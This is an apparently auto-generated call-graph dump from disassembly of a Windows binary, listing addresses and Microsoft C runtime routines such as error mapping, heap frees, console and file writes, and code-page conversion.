___BuildCatchObject 9651->9652 9653 3839e5 9652->9653 9656 3839fd 9652->9656 9676 379a33 9653->9676 9655 383a9b 9658 379a33 __dosmaperr 20 API calls 9655->9658 9656->9655 9661 383a32 9656->9661 9660 383aa0 9658->9660 9659 379a46 __dosmaperr 20 API calls 9671 3839f2 ___BuildCatchObject 9659->9671 9662 379a46 __dosmaperr 20 API calls 9660->9662 9679 3820d0 EnterCriticalSection 9661->9679 9664 383aa8 9662->9664 9666 37998a ___std_exception_copy 26 API calls 9664->9666 9665 383a38 9667 383a69 9665->9667 9668 383a54 9665->9668 9666->9671 9680 383abc 9667->9680 9670 379a46 __dosmaperr 20 API calls 9668->9670 9673 383a59 9670->9673 9671->9628 9672 383a64 9731 383a93 9672->9731 9674 379a33 __dosmaperr 20 API calls 9673->9674 9674->9672 9677 379ed4 _abort 20 API calls 9676->9677 9678 379a38 9677->9678 9678->9659 9679->9665 9681 383aea 9680->9681 9719 383ae3 9680->9719 9682 383b0d 9681->9682 9683 383aee 9681->9683 9686 383b5e 9682->9686 9687 383b41 9682->9687 9685 379a33 __dosmaperr 20 API calls 9683->9685 9684 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9688 383cc4 9684->9688 9689 383af3 9685->9689 9691 383b74 9686->9691 9734 383fbb 9686->9734 9690 379a33 __dosmaperr 20 API calls 9687->9690 9688->9672 9692 379a46 __dosmaperr 20 API calls 9689->9692 9693 383b46 9690->9693 9737 383661 9691->9737 9695 383afa 9692->9695 9697 379a46 __dosmaperr 20 API calls 9693->9697 9698 37998a ___std_exception_copy 26 API calls 9695->9698 9702 383b4e 9697->9702 9698->9719 9700 383bbb 9706 383bcf 9700->9706 9707 383c15 WriteFile 9700->9707 9701 383b82 9703 383ba8 9701->9703 9704 383b86 9701->9704 9705 37998a ___std_exception_copy 26 API calls 9702->9705 9749 383441 GetConsoleCP 9703->9749 9708 383c7c 9704->9708 9744 3835f4 9704->9744 9705->9719 9711 383c05 9706->9711 9712 383bd7 9706->9712 9710 383c38 GetLastError 9707->9710 9715 383b9e 9707->9715 9708->9719 9720 379a46 __dosmaperr 20 API calls 9708->9720 9710->9715 9775 3836d7 9711->9775 9716 383bdc 9712->9716 9717 383bf5 9712->9717 9715->9708 9715->9719 9722 383c58 9715->9722 9716->9708 9760 3837b6 9716->9760 9767 3838a4 9717->9767 9719->9684 9721 383ca1 9720->9721 9724 379a33 __dosmaperr 20 API calls 9721->9724 9725 383c5f 9722->9725 9726 383c73 9722->9726 9724->9719 9728 379a46 __dosmaperr 20 API calls 9725->9728 9782 379a10 9726->9782 9729 383c64 9728->9729 9730 379a33 __dosmaperr 20 API calls 9729->9730 9730->9719 9823 3820f3 LeaveCriticalSection 9731->9823 9733 383a99 9733->9671 9787 383f3d 9734->9787 9809 383050 9737->9809 9739 383671 9740 383676 9739->9740 9741 379e50 _abort 38 API calls 9739->9741 9740->9700 9740->9701 9742 383699 9741->9742 9742->9740 9743 3836b7 GetConsoleMode 9742->9743 9743->9740 9745 38364e 9744->9745 9746 383619 9744->9746 9745->9715 9746->9745 9747 384131 WriteConsoleW CreateFileW 9746->9747 9748 383650 GetLastError 9746->9748 9747->9746 9748->9745 9754 3834a4 9749->9754 9759 3835b6 9749->9759 9750 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9751 3835f0 9750->9751 9751->9715 9753 382a0f 40 API calls __fassign 9753->9754 9754->9753 9755 38352a WideCharToMultiByte 9754->9755 9758 383581 WriteFile 9754->9758 9754->9759 9818 379a59 9754->9818 9756 383550 WriteFile 9755->9756 9755->9759 9756->9754 9757 3835d9 GetLastError 9756->9757 9757->9759 9758->9754 9758->9757 9759->9750 9765 3837c5 9760->9765 9761 383887 9762 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9761->9762 9764 3838a0 9762->9764 9763 383843 WriteFile 9763->9765 9766 383889 GetLastError 9763->9766 9764->9715 9765->9761 9765->9763 9766->9761 9774 3838b3 9767->9774 9768 3839be 9769 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9768->9769 9771 3839cd 9769->9771 9770 383935 WideCharToMultiByte 9772 38396a WriteFile 9770->9772 9773 3839b6 GetLastError 9770->9773 9771->9715 9772->9773 9772->9774 9773->9768 9774->9768 9774->9770 9774->9772 9779 3836e6 9775->9779 9776 383799 9777 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9776->9777 9781 3837b2 9777->9781 9778 383758 WriteFile 9778->9779 9780 38379b GetLastError 9778->9780 9779->9776 9779->9778 9780->9776 9781->9715 9783 379a33 __dosmaperr 20 API calls 9782->9783 9784 379a1b __dosmaperr 9783->9784 9785 379a46 __dosmaperr 20 API calls 9784->9785 9786 379a2e 9785->9786 9786->9719 9796 3821a7 9787->9796 9789 383f4f 9790 383f68 SetFilePointerEx 9789->9790 9791 383f57 9789->9791 9792 383f80 GetLastError 9790->9792 9795 383f5c 9790->9795 9793 379a46 __dosmaperr 20 API calls 9791->9793 9794 379a10 __dosmaperr 20 API calls 9792->9794 9793->9795 9794->9795 9795->9691 9797 3821b4 9796->9797 9800 3821c9 9796->9800 9798 379a33 __dosmaperr 20 API calls 9797->9798 9799 3821b9 9798->9799 9802 379a46 __dosmaperr 20 API calls 9799->9802 9801 379a33 __dosmaperr 20 API calls 9800->9801 9803 3821ee 9800->9803 9804 3821f9 9801->9804 9805 3821c1 9802->9805 9803->9789 9806 379a46 __dosmaperr 20 API calls 9804->9806 9805->9789 9807 382201 9806->9807 9808 37998a ___std_exception_copy 26 API calls 9807->9808 9808->9805 9810 38305d 9809->9810 9811 38306a 9809->9811 9812 379a46 __dosmaperr 20 API calls 9810->9812 9814 383076 9811->9814 9815 379a46 __dosmaperr 20 API calls 9811->9815 9813 383062 9812->9813 9813->9739 9814->9739 9816 383097 9815->9816 9817 37998a ___std_exception_copy 26 API calls 9816->9817 9817->9813 9819 379e50 _abort 38 API calls 9818->9819 9820 379a64 9819->9820 9821 379f9f __fassign 38 API calls 9820->9821 9822 379a74 9821->9822 9822->9754 9823->9733 9827 384430 9824->9827 9826 3844d6 9826->9648 9828 38443c ___BuildCatchObject 9827->9828 9838 3820d0 EnterCriticalSection 9828->9838 9830 38444a 9831 38447c 9830->9831 9832 384471 9830->9832 9834 379a46 __dosmaperr 20 API calls 9831->9834 9839 384559 9832->9839 9835 384477 9834->9835 9854 3844a6 9835->9854 9837 384499 ___BuildCatchObject 9837->9826 9838->9830 9840 3821a7 26 API calls 9839->9840 9842 384569 9840->9842 9841 38456f 9857 382116 9841->9857 9842->9841 9843 3845a1 9842->9843 9845 3821a7 26 API calls 9842->9845 9843->9841 9846 3821a7 26 API calls 9843->9846 9849 384598 9845->9849 9850 3845ad CloseHandle 9846->9850 9848 3845e9 9848->9835 9852 3821a7 26 API calls 9849->9852 9850->9841 9853 3845b9 GetLastError 9850->9853 9851 379a10 __dosmaperr 20 API calls 9851->9848 9852->9843 9853->9841 9866 3820f3 LeaveCriticalSection 9854->9866 9856 3844b0 9856->9837 9858 38218c 9857->9858 9859 382125 9857->9859 9860 379a46 __dosmaperr 20 API calls 9858->9860 9859->9858 9865 38214f 9859->9865 9861 382191 9860->9861 9862 379a33 __dosmaperr 20 API calls 9861->9862 9863 38217c 9862->9863 9863->9848 9863->9851 9864 382176 SetStdHandle 9864->9863 9865->9863 9865->9864 9866->9856 9867->9622 9868->9602 9879 37a00f 9880 37a01b ___BuildCatchObject 9879->9880 9881 37a052 ___BuildCatchObject 9880->9881 9887 37b1a4 EnterCriticalSection 9880->9887 9883 37a02f 9884 37b113 __fassign 20 API calls 9883->9884 9885 37a03f 9884->9885 9888 37a058 9885->9888 9887->9883 9891 37b1ec LeaveCriticalSection 9888->9891 9890 37a05f 9890->9881 9891->9890 9892 37dc0e 9893 37dc16 pre_c_initialization 9892->9893 9910 38176f 9893->9910 9895 37dc21 pre_c_initialization 9917 37e5cc 9895->9917 9897 37dcaa 9898 37df6f ___scrt_fastfail 4 API calls 9897->9898 9900 37dcb1 ___scrt_initialize_default_local_stdio_options 9898->9900 9899 37dc36 __RTC_Initialize 9899->9897 9922 37e76d 9899->9922 9902 37dc4f pre_c_initialization 9902->9897 9903 37dc60 9902->9903 9925 37e82b InitializeSListHead 9903->9925 9905 37dc65 pre_c_initialization 9926 37e837 9905->9926 9907 37dc88 pre_c_initialization 9932 37a061 9907->9932 9909 37dc93 pre_c_initialization 9911 38177e 9910->9911 9912 3817a1 9910->9912 9911->9912 9913 379a46 __dosmaperr 20 API calls 9911->9913 9912->9895 9914 381791 9913->9914 9915 37998a ___std_exception_copy 26 API calls 9914->9915 9916 38179c 9915->9916 9916->9895 9918 37e5da 9917->9918 9921 37e5df ___scrt_initialize_onexit_tables 9917->9921 9919 37df6f ___scrt_fastfail 4 API calls 9918->9919 9918->9921 9920 37e662 9919->9920 9921->9899 9939 37e732 9922->9939 9925->9905 9977 3818fb 9926->9977 9928 37e848 9929 37e84f 9928->9929 9930 37df6f ___scrt_fastfail 4 API calls 9928->9930 9929->9907 9931 37e857 9930->9931 9933 379e50 _abort 38 API calls 9932->9933 9934 37a06c 9933->9934 9935 37a0a4 9934->9935 9936 379a46 __dosmaperr 20 API calls 9934->9936 9935->9909 9937 37a099 9936->9937 9938 37998a ___std_exception_copy 26 API calls 9937->9938 9938->9935 9940 37e756 9939->9940 9941 37e74f 9939->9941 9948 37d91d 9940->9948 9945 37d8ad 9941->9945 9944 37e754 9944->9902 9946 37d91d __onexit 29 API calls 9945->9946 9947 37d8bf 9946->9947 9947->9944 9951 37d605 9948->9951 9954 37d53b 9951->9954 9953 37d629 9953->9944 9955 37d547 ___BuildCatchObject 9954->9955 9962 37b1a4 EnterCriticalSection 9955->9962 9957 37d555 9963 37d76c 9957->9963 9959 37d562 9973 37d580 9959->9973 9961 37d573 ___BuildCatchObject 9961->9953 9962->9957 9964 37d782 try_get_function 9963->9964 9965 37d78a 9963->9965 9964->9959 9965->9964 9966 37d7e3 9965->9966 9967 37dafa __onexit 29 API calls 9965->9967 9966->9964 9968 37dafa __onexit 29 API calls 9966->9968 9969 37d7d9 9967->9969 9970 37d7f9 9968->9970 9971 37a8fb _free 20 API calls 9969->9971 9972 37a8fb _free 20 API calls 9970->9972 9971->9966 9972->9964 9976 37b1ec LeaveCriticalSection 9973->9976 9975 37d58a 9975->9961 9976->9975 9978 381919 pre_c_initialization 9977->9978 9982 381939 pre_c_initialization 9977->9982 9979 379a46 __dosmaperr 20 API calls 9978->9979 9980 38192f 9979->9980 9981 37998a ___std_exception_copy 26 API calls 9980->9981 9981->9982 9982->9928 8022 3814fb 8031 381f39 GetEnvironmentStringsW 8022->8031 8026 37a8fb _free 20 API calls 8027 381548 8026->8027 8028 38151e 8055 37a8fb 8028->8055 8030 381513 8030->8026 8032 38150d 8031->8032 8033 381f4d 8031->8033 8032->8030 8038 38154e 8032->8038 8061 37bf3c 8033->8061 8035 381f61 8036 37a8fb _free 20 API calls 8035->8036 8037 381f7b FreeEnvironmentStringsW 8036->8037 8037->8032 8040 38156c 8038->8040 8039 37a89e _abort 20 API calls 8041 3815a6 8039->8041 8040->8039 8042 381617 8041->8042 8045 37a89e _abort 20 API calls 8041->8045 8046 381619 8041->8046 8050 38163b 8041->8050 8053 37a8fb _free 20 API calls 8041->8053 8262 37bf8a 8041->8262 8043 37a8fb _free 20 API calls 8042->8043 8044 381631 8043->8044 8044->8028 8045->8041 8271 381648 8046->8271 8277 37999a IsProcessorFeaturePresent 8050->8277 8051 37a8fb _free 20 API calls 8051->8042 8053->8041 8054 381647 8056 37a906 HeapFree 8055->8056 8057 37a92f __dosmaperr 8055->8057 8056->8057 8058 37a91b 8056->8058 8057->8030 8059 379a46 __dosmaperr 18 API calls 8058->8059 8060 37a921 GetLastError 8059->8060 8060->8057 8062 37bf7a 8061->8062 8066 37bf4a _abort 8061->8066 8073 379a46 8062->8073 8063 37bf65 RtlAllocateHeap 8065 37bf78 8063->8065 8063->8066 8065->8035 8066->8062 8066->8063 8068 37c86c 8066->8068 8076 37c8b0 8068->8076 8071 37c8ac 8071->8066 8072 37c882 8082 37de3e 8072->8082 8095 379ed4 GetLastError 8073->8095 8077 37c8bc ___BuildCatchObject 8076->8077 8089 37b1a4 EnterCriticalSection 8077->8089 8079 37c8c7 8090 37c8f9 8079->8090 8081 37c8ee ___BuildCatchObject 8081->8072 8083 37de47 8082->8083 8084 37de49 IsProcessorFeaturePresent 8082->8084 8083->8071 8086 37e1f7 8084->8086 8094 37e1bb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8086->8094 8088 37e2da 8088->8071 8089->8079 8093 37b1ec LeaveCriticalSection 8090->8093 8092 37c900 8092->8081 8093->8092 8094->8088 8096 379eed 8095->8096 8097 379ef3 8095->8097 8114 37aaf8 8096->8114 8102 379f4a SetLastError 8097->8102 8121 37a89e 8097->8121 8101 379f0d 8105 37a8fb _free 17 API calls 8101->8105 8103 379a4b 8102->8103 8103->8065 8107 379f13 8105->8107 8109 379f41 SetLastError 8107->8109 8108 379f29 8135 379cc2 8108->8135 8109->8103 8112 37a8fb _free 17 API calls 8113 379f3a 8112->8113 8113->8102 8113->8109 8140 37a935 8114->8140 8117 37ab37 TlsGetValue 8118 37ab2b 8117->8118 8119 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8118->8119 8120 37ab48 8119->8120 8120->8097 8122 37a8ab _abort 8121->8122 8123 37a8eb 8122->8123 8124 37a8d6 RtlAllocateHeap 8122->8124 8127 37c86c _abort 7 API calls 8122->8127 8125 379a46 __dosmaperr 19 API calls 8123->8125 8124->8122 8126 379f05 8124->8126 8125->8126 8126->8101 8128 37ab4e 8126->8128 8127->8122 8129 37a935 _abort 5 API calls 8128->8129 8130 37ab75 8129->8130 8131 37ab90 TlsSetValue 8130->8131 8132 37ab84 8130->8132 8131->8132 8133 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8132->8133 8134 379f22 8133->8134 8134->8101 8134->8108 8154 379c9a 8135->8154 8141 37a965 8140->8141 8143 37a961 8140->8143 8141->8117 8141->8118 8143->8141 8146 37a985 8143->8146 8147 37a9d1 8143->8147 8144 37a991 GetProcAddress 8145 37a9a1 try_get_function 8144->8145 8145->8141 8146->8141 8146->8144 8148 37a9e7 8147->8148 8149 37a9f2 LoadLibraryExW 8147->8149 8148->8143 8150 37aa27 8149->8150 8151 37aa0f GetLastError 8149->8151 8150->8148 8153 37aa3e FreeLibrary 8150->8153 8151->8150 8152 37aa1a LoadLibraryExW 8151->8152 8152->8150 8153->8148 8160 379bda 8154->8160 8156 379cbe 8157 379c4a 8156->8157 8171 379ade 8157->8171 8159 379c6e 8159->8112 8161 379be6 ___BuildCatchObject 8160->8161 8166 37b1a4 EnterCriticalSection 8161->8166 8163 379bf0 8167 379c16 8163->8167 8165 379c0e ___BuildCatchObject 8165->8156 8166->8163 8170 37b1ec LeaveCriticalSection 8167->8170 8169 379c20 8169->8165 8170->8169 8172 379aea ___BuildCatchObject 8171->8172 8179 37b1a4 EnterCriticalSection 8172->8179 8174 379af4 8180 379e05 8174->8180 8176 379b0c 8184 379b22 8176->8184 8178 379b1a ___BuildCatchObject 8178->8159 8179->8174 8181 379e3b __fassign 8180->8181 8182 379e14 __fassign 8180->8182 8181->8176 8182->8181 8187 37ae4d 8182->8187 8261 37b1ec LeaveCriticalSection 8184->8261 8186 379b2c 8186->8178 8188 37aecd 8187->8188 8190 37ae63 8187->8190 8191 37a8fb _free 20 API calls 8188->8191 8213 37af1b 8188->8213 8190->8188 8192 37ae96 8190->8192 8196 37a8fb _free 20 API calls 8190->8196 8193 37aeef 8191->8193 8202 37a8fb _free 20 API calls 8192->8202 8212 37aeb8 8192->8212 8194 37a8fb _free 20 API calls 8193->8194 8198 37af02 8194->8198 8195 37a8fb _free 20 API calls 8199 37aec2 8195->8199 8201 37ae8b 8196->8201 8197 37af29 8200 37af89 8197->8200 8214 37a8fb 20 API calls _free 8197->8214 8203 37a8fb _free 20 API calls 8198->8203 8206 37a8fb _free 20 API calls 8199->8206 8207 37a8fb _free 20 API calls 8200->8207 8215 37bcb5 8201->8215 8204 37aead 8202->8204 8205 37af10 8203->8205 8243 37bdb3 8204->8243 8210 37a8fb _free 20 API calls 8205->8210 8206->8188 8211 37af8f 8207->8211 8210->8213 8211->8181 8212->8195 8255 37afc0 8213->8255 8214->8197 8216 37bcc6 8215->8216 8242 37bdaf 8215->8242 8217 37bcd7 8216->8217 8218 37a8fb _free 20 API calls 8216->8218 8219 37bce9 8217->8219 8220 37a8fb _free 20 API calls 8217->8220 8218->8217 8221 37bcfb 8219->8221 8222 37a8fb _free 20 API calls 8219->8222 8220->8219 8223 37bd0d 8221->8223 8225 37a8fb _free 20 API calls 8221->8225 8222->8221 8224 37bd1f 8223->8224 8226 37a8fb _free 20 API calls 8223->8226 8227 37bd31 8224->8227 8228 37a8fb _free 20 API calls 8224->8228 8225->8223 8226->8224 8229 37bd43 8227->8229 8230 37a8fb _free 20 API calls 8227->8230 8228->8227 8231 37bd55 8229->8231 8233 37a8fb _free 20 API calls 8229->8233 8230->8229 8232 37bd67 8231->8232 8234 37a8fb _free 20 API calls 8231->8234 8235 37bd79 8232->8235 8236 37a8fb _free 20 API calls 8232->8236 8233->8231 8234->8232 8237 37a8fb _free 20 API calls 8235->8237 8238 37bd8b 8235->8238 8236->8235 8237->8238 8239 37a8fb _free 20 API calls 8238->8239 8241 37bd9d 8238->8241 8239->8241 8240 37a8fb _free 20 API calls 8240->8242 8241->8240 8241->8242 8242->8192 8244 37bdc0 8243->8244 8245 37be18 8243->8245 8246 37bdd0 8244->8246 8247 37a8fb _free 20 API calls 8244->8247 8245->8212 8248 37bde2 8246->8248 8249 37a8fb _free 20 API calls 8246->8249 8247->8246 8250 37bdf4 8248->8250 8251 37a8fb _free 20 API calls 8248->8251 8249->8248 8252 37be06 8250->8252 8253 37a8fb _free 20 API calls 8250->8253 8251->8250 8252->8245 8254 37a8fb _free 20 API calls 8252->8254 8253->8252 8254->8245 8256 37afeb 8255->8256 8257 37afcd 8255->8257 8256->8197 8257->8256 8258 37be58 __fassign 20 API calls 8257->8258 8259 37afe5 8258->8259 8260 37a8fb _free 20 API calls 8259->8260 8260->8256 8261->8186 8263 37bf97 8262->8263 8264 37bfa5 8262->8264 8263->8264 8269 37bfbe 8263->8269 8265 379a46 __dosmaperr 20 API calls 8264->8265 8266 37bfaf 8265->8266 8281 37998a 8266->8281 8268 37bfb9 8268->8041 8269->8268 8270 379a46 __dosmaperr 20 API calls 8269->8270 8270->8266 8275 381655 8271->8275 8276 38161f 8271->8276 8272 38166c 8274 37a8fb _free 20 API calls 8272->8274 8273 37a8fb _free 20 API calls 8273->8275 8274->8276 8275->8272 8275->8273 8276->8051 8278 3799a5 8277->8278 8295 3797c0 8278->8295 8284 37990f 8281->8284 8283 379996 8283->8268 8285 379ed4 _abort 20 API calls 8284->8285 8286 379925 8285->8286 8287 379984 8286->8287 8288 379933 8286->8288 8289 37999a ___std_exception_copy 11 API calls 8287->8289 8293 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8288->8293 8290 379989 8289->8290 8291 37990f ___std_exception_copy 26 API calls 8290->8291 8292 379996 8291->8292 8292->8283 8294 37995a 8293->8294 8294->8283 8296 3797dc _abort ___scrt_get_show_window_mode 8295->8296 8297 379808 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8296->8297 8298 3798d9 _abort 8297->8298 8299 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8298->8299 8300 3798f7 GetCurrentProcess TerminateProcess 8299->8300 8300->8054 8301 37b6de 8304 37b5dc 8301->8304 8324 379e50 GetLastError 8304->8324 8306 37b5e9 8344 37b6fb 8306->8344 8308 37b5f1 8353 37b370 8308->8353 8311 37b608 8312 37bf3c __onexit 21 API calls 8313 37b619 8312->8313 8314 37b64b 8313->8314 8360 37b79d 8313->8360 8317 37a8fb _free 20 API calls 8314->8317 8317->8311 8318 37b646 8319 379a46 __dosmaperr 20 API calls 8318->8319 8319->8314 8320 37b68f 8320->8314 8370 37b246 8320->8370 8321 37b663 8321->8320 8322 37a8fb _free 20 API calls 8321->8322 8322->8320 8325 379e66 8324->8325 8326 379e6c 8324->8326 8328 37aaf8 _abort 11 API calls 8325->8328 8327 37a89e _abort 20 API calls 8326->8327 8330 379ebb SetLastError 8326->8330 8329 379e7e 8327->8329 8328->8326 8331 379e86 8329->8331 8332 37ab4e _abort 11 API calls 8329->8332 8330->8306 8333 37a8fb _free 20 API calls 8331->8333 8334 379e9b 8332->8334 8335 379e8c 8333->8335 8334->8331 8336 379ea2 8334->8336 8337 379ec7 SetLastError 8335->8337 8338 379cc2 _abort 20 API calls 8336->8338 8373 37a85b 8337->8373 8340 379ead 8338->8340 8342 37a8fb _free 20 API calls 8340->8342 8343 379eb4 8342->8343 8343->8330 8343->8337 8345 37b707 ___BuildCatchObject 8344->8345 8346 379e50 _abort 38 API calls 8345->8346 8348 37b711 8346->8348 8350 37b795 ___BuildCatchObject 8348->8350 8351 37a85b _abort 38 API calls 8348->8351 8352 37a8fb _free 20 API calls 8348->8352 8523 37b1a4 EnterCriticalSection 8348->8523 8524 37b78c 8348->8524 8350->8308 8351->8348 8352->8348 8528 376093 8353->8528 8356 37b3a3 8358 37b3a8 GetACP 8356->8358 8359 37b3ba 8356->8359 8357 37b391 GetOEMCP 8357->8359 8358->8359 8359->8311 8359->8312 8361 37b370 40 API calls 8360->8361 8362 37b7bc 8361->8362 8364 37b80d IsValidCodePage 8362->8364 8367 37b7c3 8362->8367 8369 37b832 ___scrt_get_show_window_mode 8362->8369 8363 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8365 37b63e 8363->8365 8366 37b81f GetCPInfo 8364->8366 8364->8367 8365->8318 8365->8321 8366->8367 8366->8369 8367->8363 8565 37b448 GetCPInfo 8369->8565 8641 37b203 8370->8641 8372 37b26a 8372->8314 8384 37c5f5 8373->8384 8376 37a86b 8377 37a893 8376->8377 8378 37a875 IsProcessorFeaturePresent 8376->8378 8414 37c4a5 8377->8414 8380 37a880 8378->8380 8382 3797c0 _abort 8 API calls 8380->8382 8382->8377 8417 37c563 8384->8417 8387 37c650 8388 37c65c _abort 8387->8388 8389 379ed4 _abort 20 API calls 8388->8389 8393 37c689 _abort 8388->8393 8396 37c683 _abort 8388->8396 8389->8396 8390 37c6d5 8392 379a46 __dosmaperr 20 API calls 8390->8392 8391 37c6b8 8440 37e509 8391->8440 8394 37c6da 8392->8394 8400 37c701 8393->8400 8431 37b1a4 EnterCriticalSection 8393->8431 8397 37998a ___std_exception_copy 26 API calls 8394->8397 8396->8390 8396->8391 8396->8393 8397->8391 8401 37c760 8400->8401 8407 37c758 8400->8407 8411 37c78b 8400->8411 8432 37b1ec LeaveCriticalSection 8400->8432 8401->8411 8433 37c647 8401->8433 8404 37c4a5 _abort 28 API calls 8404->8401 8407->8404 8408 379e50 _abort 38 API calls 8412 37c7ee 8408->8412 8410 37c647 _abort 38 API calls 8410->8411 8436 37c810 8411->8436 8412->8391 8413 379e50 _abort 38 API calls 8412->8413 8413->8391 8444 37c2b4 8414->8444 8420 37c509 8417->8420 8419 37a860 8419->8376 8419->8387 8421 37c515 ___BuildCatchObject 8420->8421 8426 37b1a4 EnterCriticalSection 8421->8426 8423 37c523 8427 37c557 8423->8427 8425 37c54a ___BuildCatchObject 8425->8419 8426->8423 8430 37b1ec LeaveCriticalSection 8427->8430 8429 37c561 8429->8425 8430->8429 8431->8400 8432->8407 8434 379e50 _abort 38 API calls 8433->8434 8435 37c64c 8434->8435 8435->8410 8437 37c816 8436->8437 8438 37c7df 8436->8438 8443 37b1ec LeaveCriticalSection 8437->8443 8438->8391 8438->8408 8438->8412 8441 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8440->8441 8442 37e514 8441->8442 8442->8442 8443->8438 8445 37c2c0 _abort 8444->8445 8451 37c2d8 8445->8451 8466 37e0bd GetModuleHandleW 8445->8466 8475 37b1a4 EnterCriticalSection 8451->8475 8452 37c2e0 8454 37c355 8452->8454 8465 37c37e 8452->8465 8476 37d8c3 8452->8476 8455 37c36d 8454->8455 8479 37d49a 8454->8479 8461 37d49a _abort 5 API calls 8455->8461 8456 37c3c7 8459 37e509 _abort 5 API calls 8456->8459 8457 37c39b 8486 37c3cd 8457->8486 8464 37a89d 8459->8464 8461->8465 8483 37c3be 8465->8483 8467 37c2cc 8466->8467 8467->8451 8468 37c40e GetModuleHandleExW 8467->8468 8469 37c438 GetProcAddress 8468->8469 8470 37c44d 8468->8470 8469->8470 8471 37c461 FreeLibrary 8470->8471 8472 37c46a 8470->8472 8471->8472 8473 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8472->8473 8474 37c474 8473->8474 8474->8451 8475->8452 8494 37d5dd 8476->8494 8482 37d4c9 8479->8482 8480 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8481 37d4f2 8480->8481 8481->8455 8482->8480 8516 37b1ec LeaveCriticalSection 8483->8516 8485 37c397 8485->8456 8485->8457 8517 37ad13 8486->8517 8489 37c3fb 8491 37c40e _abort 8 API calls 8489->8491 8490 37c3db GetPEB 8490->8489 8492 37c3eb GetCurrentProcess TerminateProcess 8490->8492 8493 37c403 ExitProcess 8491->8493 8492->8489 8497 37d58c 8494->8497 8496 37d601 8496->8454 8498 37d598 ___BuildCatchObject 8497->8498 8505 37b1a4 EnterCriticalSection 8498->8505 8500 37d5a6 8506 37d64c 8500->8506 8504 37d5c4 ___BuildCatchObject 8504->8496 8505->8500 8509 37d674 8506->8509 8510 37d66c 8506->8510 8507 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8508 37d5b3 8507->8508 8512 37d5d1 8508->8512 8509->8510 8511 37a8fb _free 20 API calls 8509->8511 8510->8507 8511->8510 8515 37b1ec LeaveCriticalSection 8512->8515 8514 37d5db 8514->8504 8515->8514 8516->8485 8518 37ad38 8517->8518 8522 37ad2e 8517->8522 8519 37a935 _abort 5 API calls 8518->8519 8519->8522 8520 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8521 37ad96 8520->8521 8521->8489 8521->8490 8522->8520 8523->8348 8527 37b1ec LeaveCriticalSection 8524->8527 8526 37b793 8526->8348 8527->8526 8529 3760a6 8528->8529 8530 3760b0 8528->8530 8529->8356 8529->8357 8530->8529 8531 379e50 _abort 38 API calls 8530->8531 8532 3760d1 8531->8532 8536 379f9f 8532->8536 8537 379fb2 8536->8537 8538 3760ea 8536->8538 8537->8538 8544 37b09c 8537->8544 8540 379fcc 8538->8540 8541 379ff4 8540->8541 8542 379fdf 8540->8542 8541->8529 8542->8541 8543 37b6fb __fassign 38 API calls 8542->8543 8543->8541 8545 37b0a8 ___BuildCatchObject 8544->8545 8546 379e50 _abort 38 API calls 8545->8546 8547 37b0b1 8546->8547 8550 37b0ff ___BuildCatchObject 8547->8550 8556 37b1a4 EnterCriticalSection 8547->8556 8549 37b0cf 8557 37b113 8549->8557 8550->8538 8555 37a85b _abort 38 API calls 8555->8550 8556->8549 8558 37b121 __fassign 8557->8558 8560 37b0e3 8557->8560 8559 37ae4d __fassign 20 API calls 8558->8559 8558->8560 8559->8560 8561 37b102 8560->8561 8564 37b1ec LeaveCriticalSection 8561->8564 8563 37b0f6 8563->8550 8563->8555 8564->8563 8566 37b52c 8565->8566 8567 37b482 8565->8567 8570 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8566->8570 8575 37a71e 8567->8575 8572 37b5d8 8570->8572 8572->8367 8574 37cc66 44 API calls 8574->8566 8576 376093 __fassign 38 API calls 8575->8576 8577 37a73e MultiByteToWideChar 8576->8577 8579 37a814 8577->8579 8580 37a77c 8577->8580 8581 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8579->8581 8582 37bf3c __onexit 21 API calls 8580->8582 8586 37a79d __alloca_probe_16 ___scrt_get_show_window_mode 8580->8586 8583 37a837 8581->8583 8582->8586 8589 37cc66 8583->8589 8584 37a80e 8594 37a83b 8584->8594 8586->8584 8587 37a7e2 MultiByteToWideChar 8586->8587 8587->8584 8588 37a7fe GetStringTypeW 8587->8588 8588->8584 8590 376093 __fassign 38 API calls 8589->8590 8591 37cc79 8590->8591 8598 37ca49 8591->8598 8595 37a847 8594->8595 8596 37a858 8594->8596 8595->8596 8597 37a8fb _free 20 API calls 8595->8597 8596->8579 8597->8596 8599 37ca64 8598->8599 8600 37ca8a MultiByteToWideChar 8599->8600 8601 37cab4 8600->8601 8602 37cc3e 8600->8602 8607 37bf3c __onexit 21 API calls 8601->8607 8608 37cad5 __alloca_probe_16 8601->8608 8603 37de3e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8602->8603 8604 37b504 8603->8604 8604->8574 8605 37cb8a 8611 37a83b __freea 20 API calls 8605->8611 8606 37cb1e MultiByteToWideChar 8606->8605 8609 37cb37 8606->8609 8607->8608 8608->8605 8608->8606 8625 37ac09 8609->8625 8611->8602 8613 37cb61 8613->8605 8617 37ac09 12 API calls 8613->8617 8614 37cb99 8615 37bf3c __onexit 21 API calls 8614->8615 8619 37cbba __alloca_probe_16 